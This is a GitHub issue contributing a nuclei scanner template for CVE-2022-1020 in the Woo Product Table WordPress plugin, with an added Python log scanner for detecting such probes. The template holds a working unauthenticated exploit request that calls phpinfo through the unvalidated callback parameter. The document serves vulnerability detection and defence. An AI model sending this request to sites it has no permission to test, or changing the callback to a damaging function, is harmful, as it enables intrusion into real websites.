projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License

CVE-2022-1020 #4203

Closed akincibor closed 2 years ago

akincibor commented 2 years ago
```yaml
id: CVE-2022-1020

info:
  name: Woo Product Table < 3.1.2 - Unauthenticated Arbitrary Function Call
  author: Akincibor
  severity: high
  description: The plugin does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.
  reference:
    - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5
  tags: wp,wp-plugin,wordpress,cve,cve2022

requests:
  - method: GET
    path:
      # The unvalidated callback parameter is set to phpinfo
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option&option_key=a&perpose=update&callback=phpinfo'

    # Both phpinfo() marker strings and an HTTP 200 status must match
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    # Report the PHP version shown in the phpinfo() output
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
```

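
A defender-side check for requests shaped like the template's probe, as an added example that is not part of the original issue or the nuclei-templates project: it scans web-server access logs for calls to the wpt_admin_update_notice_option AJAX action that carry a callback parameter. The Combined Log Format, the function name find_callback_requests and the sample log lines are assumptions constructed for illustration; only parameters sent in the URL query string are visible to it.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed format: Combined Log Format
#   ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "wpt_admin_update_notice_option"  # AJAX action named in the template


def find_callback_requests(lines):
    """Return one dict per logged request that reaches the AJAX action
    with a callback parameter in its query string (hypothetical helper)."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        url = urlsplit(m["target"])
        # endswith() also covers WordPress installed in a subdirectory
        if not url.path.endswith(AJAX_PATH):
            continue
        # parse_qs percent-decodes, so an encoded action name still matches
        params = parse_qs(url.query, keep_blank_values=True)
        if ACTION not in params.get("action", []) or "callback" not in params:
            continue
        hits.append({"ip": m["ip"], "time": m["time"],
                     "callback": params["callback"][0],
                     "status": int(m["status"])})
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic)
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Apr/2022:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option&option_key=a&perpose=update&callback=phpinfo HTTP/1.1" 200 81234 "-" "constructed-agent"',
    '198.51.100.9 - - [12/Apr/2022:10:01:05 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "-" "constructed-agent"',
    '203.0.113.7 - - [12/Apr/2022:10:01:09 +0000] "GET /blog/wp-admin/admin-ajax.php?action=wpt%5Fadmin%5Fupdate%5Fnotice%5Foption&callback=phpinfo HTTP/1.1" 403 199 "-" "constructed-agent"',
    '198.51.100.9 - - [12/Apr/2022:10:02:00 +0000] "GET /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option&option_key=a&perpose=update HTTP/1.1" 200 1 "-" "constructed-agent"',
]

if __name__ == "__main__":
    for hit in find_callback_requests(SAMPLE_LOG):
        print(hit)
```

Each hit records the callback value and the response status, so the entries can be reviewed together with the plugin version installed on the site.
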
princechaddha commented 2 years ago

Hello @Akincibor, thank you so much for sharing this template with the community and contributing to this project 🚀